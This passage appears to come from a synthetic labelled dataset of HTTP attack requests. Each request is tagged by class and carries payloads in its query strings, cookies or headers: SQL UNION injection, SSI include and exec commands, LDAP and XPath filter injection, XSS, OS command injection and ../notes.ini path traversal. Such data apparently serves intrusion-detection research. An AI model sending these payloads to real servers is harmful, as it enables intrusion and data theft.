UA-Color: color8
Via: acu8le/2.9 133.99.177.164, FTP/2.7 238.80.185.199
Transfer-Encoding: gzip
Upgrade: masee/8.5, drdmb/5.6, asJ/9.9, oume2Y/4.6, pmsuya/8.2
X-Forwarded-For: 126.226.47.150
----: ---------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

ts=on-p eermetahs&nsitms=hhpVX&pifioi1=thOaSrcaeeha4&wDCrl8Cq_4VN=dQ/te&8tOJW240l3=me|2ls sd&iimaho='   )/**/UNIONALL/**/SELECT/**/5/**/FROM/**/bip0pfndt/**/WHERE/**/(   ''    =  '/**/&piu=h5n+&s0eae=igecaE2rme33o

End - Id: 35138
Start - Id: 41336
class: SqlInjection
GET /ns/eh.asp?cw9xsmub6trlEo=ercpoabodycoEoIh&e8emi4eei7d=85279&4A4K=+%5D HTTP/1.1
Host: 220.228.51.195:49198
Connection: close
Accept: */*
Accept-Charset: windows-1252;q=0.8, iso-8859-7, x-mac-roman
Accept-Encoding: deflate;q=0.7, compress;q=0.6
Accept-Language: *;q=0.8
Cache-Control: no-store
Client-ip: 87.232.160.255
Cookie: 3xdGrcpOnp_y=OR    '6Ncaar'     LIKE    'Sim%'
Cookie2: $Version="8"
Date: Sat, 23 Jun 07 03:35:26 GMT
ETag: W/"cKDNr8CH.0z91yq@kFD"
Expect: 100-continue
If-Modified-Since: Fri, 08 Jan 10 14:17:08 GMT
If-Unmodified-Since: Tue, 15 Jun 04 11:16:32 GMT
If-Match: "mRXWxRNuSpDXscj"
If-None-Match: "BAhw7m.T1rD981SwL"
If-Range: Sat, 21 Aug 04 11:01:08 CET
Max-Forwards: 6
Pragma: no-cache
Authorization: t7ai Stotedm=dMnQ7iEg
Range: 481797-7272,-0
Referer: http://www.tenha.cz/oiaown/piat.nsf
TE: trailers
Trailer: From
User-Agent: Mozilla/6.6 (compatible; Konqueror/5.5; Win98; nys0a)
Transfer-Encoding: deflate
Upgrade: lrh3x/8.6
Warning: 221 www.ieHmnseN.shtml "tc0exeLby" "Thu, 15 Apr 10 21:19:31 UTC"
~~~~~: ~~~~~~~~~~~~~~~~

null

End - Id: 41336
Start - Id: 39608
class: SSI
GET /ismtroerrbptscliwt/6XYDjJeATid_43_f/wC1HQqpvO058EdRA.png?eoSRn=fdtn&xp_y5W6lnLU=uasaioinput%7Esle7&oleuetne=04762465&vteloaaEn=upri%3E&aloldWn=g9b1Pg&iorlRtoeihet=x%3Ebmj&_VepassthruN=92988&6ab3cree8Edw=eiepbh&intkhg=2607561&abxbI=pnon6Tfsvt&nedaSawe=64460882&hhegicapephio=ssa&tiReaR=%3C%21--+%23include+virtual%3D%22%2Fvar%2Flog%2Fhttpd%2Faccess.log%22+++--%3E&ewr=4642920&iaoice=eyPtvraDOlc HTTP/1.0
Host: 2.116.137.85
Connection: ht5YaooO
Accept: */*
Accept-Charset: iso-2022-jp, x-mac-chinesesimp;q=0.5, x-mac-korean;q=0.6, iso-2022-jp;q=0.5, euc-jp;q=0.6
Accept-Encoding: 
Accept-Language: tex7c-iom;q=0.7, N-mebee, ee-eFok;q=0.9
Cache-Control: min-fresh=864
Client-ip: 56.53.233.183
Cookie: Wi3wc=ea5telnetiophpk h6;gjal=64964;ng5nno=4164664;tohteile3tHnia=|huf
Cookie2: $Version="219"
Date: Sun, 04 Jul 04 14:24:53 GMT
ETag: W/"5DYXg9DnNO7-9g7IHY"
Expect: 100-continue
From: ts3vhh@kqzfn.com
If-Modified-Since: Tue, 25 Mar 08 01:32:11 CET
If-Unmodified-Since: Fri, 18 May 07 20:11:32 UTC
If-Match: *
If-None-Match: *
If-Range: Mon, 05 Jan 04 22:36:04 GMT
Max-Forwards: 7
MIME-Version: 4.7
Pragma: no-cache
Proxy-Authorization: yn3o7 beia=nuSE
Authorization: rksdj iwoeehle=e7omeh
Range: 973-,-4,32221-
Referer: http://1sw5drat.de/Tahe/eolj9u/shTote/ofca4.js
TE: deflate,gzip
Trailer: Accept-Language
User-Agent: Mozilla/2.5 (Windows; U; WinNT 1.9; Mt-te; rv:3.5.2) Gecko/18691033
UA-CPU: PowerPC
UA-Disp: 150,287,16
UA-OS: Win9x
UA-Color: color8
UA-Pixels: 1841x260
Via: 0.4 33.41.211.45, 1.0 www.tlheea.shtml
Transfer-Encoding: gzip
Upgrade: i4uts/0.2, aesNA/6.1
Warning: 438 147.77.52.61 "asjnh0na0txeitfAswd" "Wed, 19 Nov 08 03:37:46 CET"
X-Forwarded-For: 216.187.237.43
X-Serial-Number: 224017819
----: ------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 39608
Start - Id: 38564
class: LdapInjection
GET /iyotH7msi8xutfctae/EPnZkJzobject/n7Jq_M4fuDa.1il7P/91vJLCtLsF0/y2TYfxb0k8wbH/e-WXxQuJg_/ufe2srimnl/poiheuLeaieemRene3eg.mdb?laea1c=tzSdX37tkkE&eAGnbaaetg=%29%28++%7C+%28SCnl%3DouM*%29&ei89=6&nn8lk7o55trhba=7Fmn&ieusoehmnOsdAt=%24ne2eso3t HTTP/1.0
Host: www.o4ibgr.ch
Connection: Hlla
Accept: */*;q=0.3
Accept-Charset: windows-1253, euc-kr, euc-kr;q=0.8, cp-950, iso-10646-ucs-2;q=0.8
Accept-Encoding: *;q=0.2
Accept-Language: oeO-ttfe, yNn-5rpap;q=0.8, tnohb-n;q=0.4
Cache-Control: noeboH=Tieheto
Client-ip: 164.121.66.240
Cookie: md=r0oo;meEI=83070;iacvemaneet9Amc=nmeb9openexecllhug mar
Cookie2: $Version="55"
Date: Fri, 20 Nov 09 19:50:03 UTC
ETag: "yvLqbLU3KSVEEAqM"
Expect: 100-continue
From: Mi7ssg@viIni5i6.de
If-Modified-Since: Sun, 29 Nov 09 20:08:17 GMT
If-Unmodified-Since: Fri, 13 Feb 04 11:36:47 GMT
If-Match: *
If-None-Match: "AyjHi7Z-kntrxlEF"
If-Range: *
Max-Forwards: 4
MIME-Version: 1.8
Pragma: no-cache
Proxy-Authorization: ohceo eebrth=greetthm
Authorization: Digest realm
Range: -5
Referer: /cenoea/esUya.jpeg
TE: trailers,chunked
Trailer: Accept
User-Agent: sia7/7.6
UA-CPU: 68000
UA-Disp: 9162,3647,32
UA-OS: Windows NT
UA-Color: color16
UA-Pixels: 6483x132
Via: HTTP/5.6 10.4.241.62:21364, 9.3 www.Tseoi.css, 5.6 184.65.95.36
Transfer-Encoding: gzip
Upgrade: noo/0.4
Warning: 605 www.aElte.jpg "smttlahhNbrou8r" 
X-Forwarded-For: 157.225.217.71
X-Serial-Number: 0288802054604644545
----: ----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38564
Start - Id: 36630
class: OsCommanding
GET /scripts/file.bat" "& dir c:/ .exe? HTTP/1.1
Host: www.hektr.ch
Connection: keep-alive
Accept: */*
Accept-Charset: *;q=0.4
Accept-Encoding: 
Accept-Language: *;q=0.3
Cache-Control: max-age=9
Client-ip: 107.48.3.140
Cookie: pn=57824;iseee1t=881;urriow=pu>k@6Thd;processing-instructionnCNzlinkHi=644027670;tet=g8DClC
Cookie2: $Version="2"
Date: Thu, 06 Aug 09 13:43:58 CET
ETag: ".sUnDhMU.R.TvYeWEG"
Expect: 100-continue
From: safieadn@TokeCnm8Oe.org
If-Modified-Since: Tue, 08 Jun 04 07:20:25 GMT
If-Unmodified-Since: Fri, 19 Aug 05 20:19:22 UTC
If-Match: "5pgR@UAQxysEehx"
If-None-Match: *
If-Range: Sun, 14 Aug 05 04:18:52 GMT
Max-Forwards: 002
MIME-Version: 2.7
Pragma: no-cache
Proxy-Authorization: Digest qop=auth-int
Authorization: Digest nonce
Range: 75537-,8-
Referer: http://www.v0OAS.st/dcFF/56ri3w/nr1oc7e/br3AEiv/uttu9.asmx
TE: chunked;q=0.9,trailers,deflate
Trailer: Via
User-Agent: Mozilla/1.1 (Machintosh; U; Mac OS X 5.5; ts-Ns; rv:2.9.2) Gecko/74419967
UA-CPU: StrongARM
UA-Disp: 427,9941,32
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 477x077
Via: HTTP/2.2 www.ueone.css
Transfer-Encoding: eicdn
Upgrade: aDote/0.4, nnlrf/4.3, ecsEa/7.5
Warning: 899 114.184.147.28:3879 "8dwEnsh88ee" 
X-Forwarded-For: 68.142.150.165
X-Serial-Number: 24160337067765
----: --------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 36630
Start - Id: 38223
class: LdapInjection
GET /2vVoIqFdz9n37bMV4f/z8McyDvj1ShavingJG5Z/naEraso5ltdbgefr.aspx?.ZI_76q5yC=934649&9rtrrhtiavetc=81152302&eriel=%29+++%28++++%7C+%28++cn%3D*o++%27brien*++++%29%28mail++++%3D*o%27brien*+%29+&or7SzaagnOfzah=hBL_Bi0&cuwaesifnn7lvfe=nN4hnP16&isetga=83391&ioErihn4us=if%3Ddo+ea8roemtht+vY&iose=84119&pfZh4tos=86216828 HTTP/1.1
Host: www.SiGirn.uk
Connection: Esny
Accept: video/quicktime
Accept-Charset: *
Accept-Encoding: *;q=0.8
Accept-Language: aul-a3uafZci, tu1nsWcO-lOk;q=0.9, iatNqtr-27fmnTo, snraAms-bb
Cache-Control: no-transform
Client-ip: 63.225.80.253
Cookie: sess8tpe=ta?bhetissE
Cookie2: $Version="194"
Date: Fri, 13 Feb 04 20:05:37 CET
ETag: "HeHqGgYUuhkexda"
Expect: 100-continue
From: Oni9Cjt@Idhlgm9aom.net
If-Modified-Since: Sun, 20 Dec 09 20:29:31 UTC
If-Unmodified-Since: Fri, 21 Mar 08 20:02:01 GMT
If-Match: "V9PGZj@JWsjgO66RM"
If-None-Match: "CY-_ds65mePOcEr"
If-Range: Sat, 04 Jul 09 22:24:10 UTC
Max-Forwards: 69
MIME-Version: 3.2
Pragma: paoeOls=ks
Proxy-Authorization: lN7eh8 3eeeTvs=rP8rhi
Authorization: Basic dEU0bnRuZTpla3NmeWFz
Range: 491-,605-2708,157323-67914
Referer: http://www.AarE.fr/oierk4.mdb
TE: trailers
Trailer: Transfer-Encoding
User-Agent: Estixq
UA-CPU: Sparc
UA-Disp: 782,245,16
UA-OS: WinNT
UA-Color: color32
UA-Pixels: 321x2267
Via: 9.1 151.234.217.144, FTP/3.9 www.rasg.gif:90, 1.5 171.66.144.67
Transfer-Encoding: compress
Upgrade: sdlwO/6.2, 4Awth/6.5, lsy/1.6, jri/4.6
Warning: 794 74.86.217.193 "6bkyotjee" "Mon, 16 Feb 09 06:30:50 GMT"
X-Forwarded-For: 10.141.187.50
X-Serial-Number: 47317311019714332645
----: ---------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38223
Start - Id: 48414
class: XPathInjection
GET /8WhucuLTnKMzobRg/gwTocK4DGi3Z/l0lulfngllposE/rF/esdDmii8eohfoi98yznB.msf?Naaagtnn0=lRlg&ncr24HabyUije=648&SnaltMheaorA=5%28t3t&lhhcU=2288&8p=64262964&1cioezwuonimsde=nTao&ar=nriooiiWeyealn&pHeTnohxrieDs=Eb%3Dh&ityih=a&Hal=tToearbodyo5sqe3&Eto=ach HTTP/1.0
Host: 194.87.182.203
Connection: close
Accept: */*;q=0.4
Accept-Charset: windows-874;q=0.3, koi8, isiri-3342;q=0.8, cp-932
Accept-Encoding: *
Accept-Language: *
Cache-Control: max-age=0362
Client-ip: 89.166.184.126
Cookie: pkytcods6untees=hhzsi;nz9=el3efvskn4narnienu;V@d_le0947=yeusne5r'   or   (i    <   count(d5na/child::text()) and     j <    count(xEe/child::comment())   and    k  < count(lmo/child::*) )    or 'uhtait'  =' Er5'  or
Cookie2: $Version="817"
Date: Sun, 16 Jul 06 11:41:42 CET
ETag: W/"JA_SYP1@VUk1I4H6"
Expect: 100-continue
From: wem8si@ltOhb.biz
If-Modified-Since: Tue, 10 Aug 04 04:20:52 UTC
If-Unmodified-Since: Sun, 17 Jul 05 01:43:38 CET
If-Match: "c6L8q1LfE6xocrqcL8t"
If-None-Match: "HVecpO67Sk5Uk4Uo"
If-Range: *
Max-Forwards: 7
MIME-Version: 7.9
Pragma: no-cache
Proxy-Authorization: Digest opaque="uacst"
Authorization: NTLM cnVsN3BoN2FNaGxvbm5sbm9jaFRhZHJ0YWtvZWtlaHRpdW9uN2Vn
Range: 78647-,9158-,4840-
Referer: /ad4w/stentt.bin
TE: trailers,trailers,trailers
Trailer: Via
User-Agent: hiCehnoaoh (nmbUVVgk8; aFGeBZNRy; t@sMVTx; alpnwX)
UA-CPU: MIPS
UA-Disp: 213,9851,16
UA-OS: Windows 98
UA-Color: color16
UA-Pixels: 979x9457
Via: 8.2 www.7irteip.gif
Transfer-Encoding: identity
Upgrade: nea/7.4, eNt/9.7, lsi/6.2, 2El/8.5, hravyc/9.6
Warning: 160 191.100.5.46 "y2fbaaTltys" "Thu, 31 May 07 10:23:19 CET"
X-Forwarded-For: 200.45.80.130
X-Serial-Number: 86756657363
----: ----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 48414
Start - Id: 36383
class: OsCommanding
GET /jnTes/a53JfEHGJbElNX1O..u/hi49ehryhayU9/dVVYRcOAcbzJaw/5uereAoatbEu/aeeltn0/n3F1.SC315lE0jZWWa/45K/hTP@8riIN/rr/a2w@BrcP1hT_k9.tiff? HTTP/1.1
Host: www.otubye.fr:479
Connection: close
Accept: video/*
Accept-Charset: x-mac-arabic;q=0.5, iso-8859-8, iso-8859-3, x-mac-chinesetrad, x-mac-hebrew;q=0.4
Accept-Encoding: gzip;q=0.6, identity;q=0.4, identity, gzip
Accept-Language: Odnaoe-a6Maw7y, Wgn-sx;q=0.1, eeag-ettU;q=0.0, uRx-eCr5o
Cookie: neamrcusDh=<!--   #exec   cmd="c:\progra~1\U6ittt7\Tm3xnGUe\27.exe    d:\7pne\www.ngrosiseor.org\lrna2d\database.mdb   /x     exporttofoxpro"-->
Date: Fri, 02 Jun 06 09:00:50 GMT
ETag: "bfy.X.HBR0vayIYG"
Expect: 100-continue
Referer: http://Ih6o.ch/edaYcf5/Eira.png
TE: trailers,chunked,gzip
User-Agent: Mozilla/4.9 (Windows; U; WinNT 7.1; 7a-1e; rv:3.1.9) Gecko/72219269
Transfer-Encoding: 3i2eAe

null

End - Id: 36383
Start - Id: 43606
class: OsCommanding
GET /o3daee/ySAAYn/3nyE/idLTs/7vIqEpFuti5w/oHee0aaiereiasn8/mGF/4asrr/otIQwHj2B5K-otvDuP.css?eldeeiv=aoD&El2f9s=0450&f2ooslxomeyt=386184&waleznHlo73foe=reitpiae6sim3zhQop&teNehe=egh&5ciaft=esuoeheidbrlfeeg&hariec=0676229218&K.FOLCOWDOM=mail+++++bio%40sndioa.n7eheyt.gov%3C%3C%2Ftmp%2Fwu.c+++%3B&biframehLwcqE8iframet=ldrahiykloaecclRNh&tisIesMea=p56laojioedt HTTP/1.1
Host: www.guse.com:80
Connection: 6uuoib0i
Accept: */*
Accept-Charset: *;q=0.1
Accept-Encoding: 
Accept-Language: un-zi;q=0.3, osbtnoe-pgaainLn
Cache-Control: no-store
Client-ip: 199.226.252.94
Cookie: uprh=btzws;Fo3Asew1haal=seaiexp_Xih ;behmbdoNry=13364;4cdjWzuNwp-0dKT=\openunioneetckha;n6pe=rE';uaulnarj=692905
Date: Thu, 12 Jul 07 14:50:22 GMT
ETag: "rB@M2mpyx3xyuriKo"
If-Modified-Since: Sat, 13 Mar 10 02:12:43 GMT
If-Match: "25Su71D5UQU-.Vy0"
Max-Forwards: 983
Pragma: no-cache
Proxy-Authorization: Basic eWFkc1NzOmdhZnI2aWo=
Authorization: eahl oSct=TrhEl
Referer: http://l2rsrht.net/uaofisa/r7vE.css
User-Agent: rsa4IeLs4tiTu
UA-OS: WinNT
Transfer-Encoding: compress
Warning: 620 www.06ano.htm "iiynpf86soiMxo16ite" "Mon, 27 Dec 04 23:11:25 UTC"
----: ------------------
~~~~~: ~~~~~~~~~~~~~~

null

End - Id: 43606
Start - Id: 48144
class: XSS
GET /_xHrSdhEVoHie/ardTosweOthhegxt/uT/x.kHnwcftkP1QY2Es7ss/rT/hCp5w/eddriaMymua4wdhabt/edmtoar/mekAetlf/lEhni.tiff?EinlinkVoimgM0openSI=157796&togSIaaia=3gnLPUsL&depr0tvi=%3Cform%2Bname%3Dtbe++++%3E%3Cselect%2Bname%3Dundc+++%3Ehttp%3A%2F%2Fwww.W.com%2FAuOn2n%2F%3F%3C%2Fselect++%3E%3C%2Fform++++%3E&3z=c%40ony%3AHWenq HTTP/1.1
Host: www.hnFtuigd.st:1
Connection: 6ll7
Accept: */*
Accept-Charset: *;q=0.6
Accept-Encoding: 
Accept-Language: *
Cache-Control: min-fresh=4
Client-ip: 103.19.58.154
Cookie: e2vlasnHj= C;ni=z taqlh7hmnh
Cookie2: $Version="618"
Date: Wed, 12 Jan 05 16:04:05 CET
ETag: W/"pYMgQR5_wNoBX6j"
Expect: fh2IAlI=egbfsrrd
From: terhoe3@ygfzae.st
If-Modified-Since: Mon, 03 Sep 07 02:10:43 GMT
If-Unmodified-Since: Tue, 25 Apr 06 23:49:44 UTC
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 58
MIME-Version: 8.0
Pragma: no-cache
Proxy-Authorization: Digest nonce
Authorization: iteOs shsTayq=nesE
Range: -54
Referer: http://www.ntio.it/hrAN/hsehJf6r/dhigt.mpeg
TE: trailers,deflate;q=0.1,trailers
Trailer: Trailer
User-Agent: dertnI (3lNfWVC5; sV3aYsbugF; m07Pcap2y; 2R-L-m5@mw; ybRsztc6)
UA-CPU: Sparc
UA-Disp: 121,8495,32
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 8071x836
Via: HTTP/0.7 22.174.38.211
Transfer-Encoding: gzip
Upgrade: ahrnb/9.3, dedEnm/2.8, Knaee1/4.9, betzh/8.1, EaMe1a/1.8
Warning: 934 182.60.171.172 "mrhrn7etePlbs" 
X-Forwarded-For: 112.65.225.240
----: --------------
~~~~~: ~~~~~~~~~~~

null

End - Id: 48144
Start - Id: 40541
class: SSI
GET /tcjaUleztn9/eclUibashecz/r_/5r9FRQsock_streamOnrJperlOY/hugLeO9/eatnuDn7ea1doo/x3a-jWVfX1FYOBjDUY/tKB9y41ZgMFk/tZ953zJwa5R/NaGX3E8Vmz7Z/eShdbtrd75ue.shtml?fcuaitsD8e=caeCDe%40p.V&P8Tm26enkpedaep=hdlsditeieeqOq3s&pis=aMnXGW1&NC=%3C%21--%23include++virtual%3D%22d%3A%5Cwindows%5Cautoexec.bat%22++++--%3E&icscriptH=6&aoawurncFiese2=t+&taruntehtiqssh=elsm%5Cv&riuliL1fegoih=189&zhbef7muri=2Xp&SElN=0147633&Bto.0uinsert9Qs=unmn7sb&8emrupovl=ot0j&eNialauiS=ss7w HTTP/1.1
Host: 144.24.145.58:80
Connection: keep-alive
Accept: application/x-tar
Accept-Charset: *;q=0.4
Accept-Encoding: *;q=0.0
Accept-Language: *;q=0.6
Cache-Control: cot=iihod0a
Client-ip: 113.181.235.9
Cookie: UWDjX5=suselect;ezsneo7Duujl=7637308;Zonmmtetpr=21229;uuootaa2Mme=document'p;passwdSNMmrkDic6=tBqqYKE53wH
Cookie2: $Version="3"
Date: Sat, 17 Mar 07 20:56:33 GMT
ETag: W/"eOdlwlZ3mNoftFC5"
Expect: umI4to3b
From: Tttt4@mie9U0h4r.com
If-Modified-Since: Wed, 10 May 06 22:27:16 UTC
If-Unmodified-Since: Sun, 05 Mar 06 17:53:54 CET
If-Match: *
If-None-Match: "NN0DEwqf7WvzUnkp26ic"
If-Range: *
Max-Forwards: 377
MIME-Version: 8.9
Pragma: u='hXniuo'
Proxy-Authorization: Digest cnonce="etpe"
Authorization: 6aniqu uooanu1o=mted
Range: -130317
Referer: /gh7n/irnidvf2.gif
TE: trailers,deflate,trailers
Trailer: If-Modified-Since
User-Agent: w1d4lAgiigdq
UA-CPU: Sparc
UA-Disp: 373,5192,32
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 3418x3633
Via: 2.0 www.hotltu.jpeg, yOidfw/7.6 61.102.96.207, FTP/7.7 183.8.233.66
Transfer-Encoding: gzip
Upgrade: emee/1.2, s5henp/5.5
Warning: 261 www.Bfrbi.gif "t7dooeohn" "Fri, 22 Jul 05 19:29:03 UTC"
X-Forwarded-For: 254.199.2.194
X-Serial-Number: 61054598804485092045
----: ----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 40541
Start - Id: 35443
class: SqlInjection
PUT /LWEMNtVgrechoHR7/gfcCWsyehtbaoxm0nhau/FK2d_bodyrg6Jc1k/sH-s0EBH4nB/IwtspIsredaotoln/wYevalFL1xKzCSwRw/rnG/bqHMjsU91cU5kuV5.gif? HTTP/1.1
Content-Length: 306
Content-Language: tu,aru40eu
Content-Encoding: deflate
Content-Location: http://2htrxj.be/HIpoie5/inyhdo2/gnA2lur/rR8roett/lagtt.sh
Content-MD5: b2JsclZ0MjJubmlyQ3NIYg==
Content-Type: application/x-www-form-urlencoded
Expires: Sun, 18 Apr 04 06:44:19 GMT
Last-Modified: Tue, 12 Oct 04 16:54:49 GMT
Host: www.tbfTsn.biz
Connection: close
Accept: */*;q=0.2
Accept-Charset: *;q=0.5
Accept-Encoding: *;q=0.1
Accept-Language: *
Cache-Control: no-transform
Client-ip: 124.241.147.173
Cookie: IPwhere@=lrceT7p;vRonmoetTynwezs=openn'ibmtpd~&usrt t0
Cookie2: $Version="688"
Date: Mon, 22 May 06 13:37:05 CET
ETag: W/"3WyXuZoccMKzD-C"
Expect: yeewi
If-Modified-Since: Sat, 24 Jul 04 24:42:34 GMT
If-Unmodified-Since: Thu, 05 Feb 04 24:03:40 CET
If-Match: "n3BD_RpvCjjYl@H5I2"
If-None-Match: *
If-Range: *
Max-Forwards: 1
MIME-Version: 3.0
Pragma: no-cache
Authorization: Basic b3ZnY2hpZWQ6cm9XNzAz
Referer: /y5ah8/9faloit/uedtA.pl
User-Agent: ; EXEC( 'UNI'+'ON'+'    '+'SEL'+'ECT   'stlqa',7160,4141059,'ktedoti',9   FROM t8eEls0e)
UA-OS: Windows 95
Via: 0.7 www.o5ie.tiff, FTP/3.1 www.5jIol.shtml, 0.8 www.dkfN.js
Transfer-Encoding: gzip
Warning: 040 www.aads.shtml "Lmnotfsuaiytt" "Wed, 10 Jun 09 05:28:12 CET"
X-Forwarded-For: 252.21.227.56
X-Serial-Number: 8980976
----: -------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~

Oo7WwRncjPx=696&cslt=3598701&heh7otrcd3j=ryl66n4.fC8Q&uWSqqkslB=t&ua_REZ='ti m $o )tw %afs&loiieGTxrsrmrep=tchilds> k&iwee=5dzd6iigioacs&anniseus=>fefqf2nph-yeho+wh~6(&y6lstv=BsasAieS7olitpdstI&UijU=m ri&eaal=81557242&eup0td=zyDpuT._BN&leausiuch=psSa rhulllusr8araudbvar&3adtfmaebfnei=sP6

End - Id: 35443
Start - Id: 45094
class: PathTransversal
GET /.nsf/../notes.ini? HTTP/1.1
Host: www.dcgst2x.de:535
Connection: keep-alive
Accept: application/rtf, text/xml;q=0.9
Accept-Charset: *
Accept-Encoding: identity
Accept-Language: u-uaAeend;q=0.3, we-bnine, lt-oolgte;q=0.9, r-tiebve3m
Cache-Control: min-fresh=2
Client-ip: 217.208.54.150
Cookie: 6fofT3ben=gqQo1;ea1smudacAs=rmOwTnha3dt 
Cookie2: $Version="39"
Date: Tue, 16 Nov 04 04:25:37 CET
ETag: "NeIswK_7a5EBHO2LNI"
Expect: 100-continue
From: hlsgr2q@lokeQ.ch
If-Modified-Since: Wed, 30 Nov 05 11:41:10 CET
If-Unmodified-Since: Wed, 12 Nov 08 05:44:50 GMT
If-Match: "cQXjZG9mFvRWGh1atz"
If-None-Match: "gAja489I21QsH_zgF6bm"
If-Range: Sun, 11 Mar 07 04:04:23 CET
Max-Forwards: 950
MIME-Version: 6.7
Pragma: ahla='llt'
Proxy-Authorization: Digest cnonce="lEha"
Authorization: Basic T2UzdHNiZUw6ZXN2NnVT
Range: 61-,599945-,96-
Referer: http://www.rhatn8t.uk/trSc/ktrio7/uoioufd/re79m.rar
TE: trailers,gzip,trailers
Trailer: Connection
User-Agent: Mozilla/1.8 (Windows; U; WinNT 3.9; hk-yr; rv:5.2.5) Gecko/44474518
UA-CPU: StrongARM
UA-Disp: 0628,6146,8
UA-OS: Win98
UA-Color: color8
UA-Pixels: 213x015
Via: 2.1 www.nmIjfen.jpg, 6.3 54.170.128.53
Transfer-Encoding: gzip
Upgrade: ud4hrt/2.8, ifephn/3.0, adtIIr/9.5, oHsuT3/8.9
Warning: 131 165.136.34.196 "tchbajdsaa" "Fri, 12 Mar 10 18:52:44 CET"
X-Forwarded-For: 211.43.232.104
X-Serial-Number: 072717739908408335
----: -----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 45094
Start - Id: 36232
class: PathTransversal
GET /.nsf/../notes.ini? HTTP/1.0
Host: www.7gTI7pasty.gov:4400
Connection: close
Accept: application/*;q=0.6, application/*
Accept-Charset: x-mac-ce, euc-jp;q=0.2, euc-kr, windows-874;q=0.4, iso-8859-9
Accept-Encoding: deflate
Accept-Language: *;q=0.2
Cache-Control: min-fresh=250
Client-ip: 58.131.95.224
Cookie: x0dZLI1J=dknMuRVCjq
Cookie2: $Version="298"
Date: Fri, 20 Apr 07 15:42:26 CET
ETag: "HNKW6sLk9FvzbJhDh2r"
Expect: 100-continue
From: tiieepnr@xgthjtra.biz
If-Modified-Since: Sat, 09 Apr 05 04:42:53 CET
If-Unmodified-Since: Tue, 30 Jun 09 19:49:34 CET
If-Match: "KF@Qh6Npq.Dbhdld7V"
If-None-Match: "dRDH1qbsVZKVsXbDYYG"
If-Range: "_k4xyieTdyAL8Fz8"
Max-Forwards: 6
MIME-Version: 9.7
Pragma: no-cache
Proxy-Authorization: Snrsty Ltrl=eythSgjt
Authorization: Basic YXVlQ3RnZTpFT3N0MWFl
Range: 183-
Referer: /EicUDH/i9rnrjc/tsH8efn/coO1.exe
TE: trailers
Trailer: Accept-Language
User-Agent: wallhiz (hprj7AZ; sBSrJGM)
UA-CPU: MIPS
UA-Disp: 399,5892,8
UA-OS: Solaris
Via: HTTP/8.1 www.hiQs.shtml
Transfer-Encoding: wco0ln; tmumx=othb
Upgrade: ahpnCe/3.0, aehm/4.9, kHt/9.5, de3Dh/9.6
Warning: 431 www.pThasq.css:58824 "eb5khn7Ir" "Wed, 20 Oct 04 17:02:16 UTC"
X-Forwarded-For: 190.138.69.239
X-Serial-Number: 779670420209
----: ------------------------------------------------
~~~~~: ~~~~~~~~~~~

null

End - Id: 36232
Start - Id: 37038
class: LdapInjection
GET /EOockgaCtnos2w/usboy/ox-oDJG@UrVYfG@SS57/eK8zPjPcN@6pr@J-Tj7O/6ngictae/uIBLCmo/iqoahhe2t55isltde/tFwWksDrXgvPGSZ/lUe0XsAEn7lq8Q8/YUnfmrLMArK/ehTlommnnHj3f/bhfbPwj.swf?bautoexec2z1NC=79286&eeapenis=n&oOhecsrtlnefAyD=l&lbsentnl8een=c%5C&ainN=7812695&Ema=1404&2An0dRjNQqc=h8S0vYm9&ede8ntiembceta=7263122&ponrk=7anudAi&idmTlqndEt=%29++++%28++++%7C++%28+cn%3D*o+++%27brien*+%29%28mail+%3D*o+++%27brien*+++%29+&wp8bo6Irod=i9e HTTP/1.0
Host: 239.105.156.102
Connection: keep-alive
Accept: */*;q=0.4
Accept-Charset: x-mac-arabic, hz-gb-2312, iso-8859-3, iso-8859-9, iso-8859-5
Accept-Encoding: compress;q=0.8
Accept-Language: *
Cache-Control: max-age=40163
Client-ip: 55.15.65.177
Cookie: s5eghbd1=i;lmte=eN st0Ni[r?nNv;mnOhx.I4=88679
Cookie2: $Version="6"
Date: Sat, 26 Jul 08 22:11:28 GMT
ETag: "Nwi0NjG_4ak-fCi9N.eQ"
Expect: kodtt
From: ugo11f@oeeH7o.uk
If-Modified-Since: Sun, 23 May 04 17:59:34 CET
If-Unmodified-Since: Tue, 09 Dec 08 04:53:48 UTC
If-Match: *
If-None-Match: "xA.HK8rw-qF53ktNCer"
If-Range: Wed, 21 Oct 09 21:18:47 UTC
Max-Forwards: 547
MIME-Version: 5.5
Pragma: Di=h
Proxy-Authorization: Digest opaque="isetlaxp"
Authorization: Digest cnonce="eaohe"
Range: -742236,5-8909,-634
Referer: /lgos/Tt1uso/geueiay.jpeg
TE: chunked,deflate
Trailer: Date
User-Agent: Mozilla/8.1 (compatible; MSIE 2.6; Open BSD i386; 0i8e5Aia)
UA-CPU: MIPS
UA-Disp: 370,042,32
UA-OS: Win98
UA-Color: color16
UA-Pixels: 9902x0663
Via: HTTP/6.0 124.140.210.216, 8.9 www.nbar3.shtml, 2.9 www.hutht6en.png
Transfer-Encoding: h4e2Oh; zotoikeu=rAgrxl
Upgrade: nopuat/4.5
Warning: 929 www.pogutin.htm "rmhurl" 
X-Forwarded-For: 164.143.217.25
X-Serial-Number: 4092233930
----: --------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 37038
Start - Id: 42474
class: SqlInjection
